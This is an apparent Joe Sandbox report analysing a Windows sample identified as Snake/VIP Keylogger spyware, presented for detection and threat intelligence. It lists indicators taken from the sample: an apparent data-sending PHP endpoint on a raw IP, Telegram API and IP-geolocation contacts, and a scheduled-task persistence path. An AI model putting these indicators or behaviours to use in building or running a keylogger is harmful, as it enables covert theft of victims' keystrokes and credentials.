http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PvAmrCZENy.exe, 00000000.00000002.906373389.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.942426959.0000000002970000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002621000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.96.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1631776
Start date and time:	2025-03-07 15:37:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PvAmrCZENy.exe renamed because original name is a hash value
Original Sample Name:	b9581e9af28f052e463acd6117271db974830bba5a7ba5825068596947e872bd.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@20/19@3/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 278 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.16.185.191
Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:38:13	API Interceptor	2085065x Sleep call for process: PvAmrCZENy.exe modified
09:38:15	API Interceptor	36x Sleep call for process: powershell.exe modified
09:38:17	API Interceptor	1328762x Sleep call for process: yxXYABHh.exe modified
09:38:45	API Interceptor	2x Sleep call for process: svchost.exe modified
15:38:15	Task Scheduler	Run new task: yxXYABHh path: C:\Users\user\AppData\Roaming\yxXYABHh.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	uB9KTHzsXJ.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PENDING PAYMENT FOR March SOA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Invoice- Trikaya Bio.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	checkip.dyndns.org/
	rDoubleheartedness.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	SAGPU05R03 - 01-YS-00052201.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	checkip.dyndns.org/
	Purchase Order # 8MJA15 - 20hrs PMS Twin Engine 150HP.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	30241696_001.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	8JVG9KELay.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	HBL NO C-ACC-250002.exe	Get hash	malicious	Snake Keylogger	Browse
	https://ipfs.io/ipfs/bafkreieqld65z4s3qt2ewjyg6bbbyhkdl2tlzzvflxmef66o3zugau2mtu/#bgruwez@besix.com	Get hash	malicious	HTMLPhisher	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.10942.8790.exe	Get hash	malicious	DarkCloud	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.31094.7078.exe	Get hash	malicious	Unknown	Browse
	Ziraat_Bankasi_Swift_Messaji.png.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win64.Malware-gen.28154.9794.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.MulDrop29.14677.15317.27570.exe	Get hash	malicious	Xmrig	Browse
	March Shipment Documents.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	HAWB772384266855 2846086773 G#U00f6nderinizinETGB .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	rjRYMApdf9.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	jcHIuFAWdB.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	8JVG9KELay.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	uB9KTHzsXJ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	PENDING PAYMENT FOR March SOA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	HBL NO C-ACC-250002.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	SecuriteInfo.com.Win32.CrypterX-gen.30422.25408.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	Shipping Document ..exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	Invoice & Packing List # SL1072401222.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	Invoice- Trikaya Bio.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
api.telegram.org	8JVG9KELay.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HBL NO C-ACC-250002.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ipfs.io/ipfs/bafkreieqld65z4s3qt2ewjyg6bbbyhkdl2tlzzvflxmef66o3zugau2mtu/#bgruwez@besix.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.10942.8790.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.31094.7078.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Ziraat_Bankasi_Swift_Messaji.png.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win64.Malware-gen.28154.9794.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.MulDrop29.14677.15317.27570.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220
	March Shipment Documents.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HAWB772384266855 2846086773 G#U00f6nderinizinETGB .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
checkip.dyndns.com	rjRYMApdf9.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	jcHIuFAWdB.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	8J

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PvAmrCZENy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

Windows Analysis Report
PvAmrCZENy.exe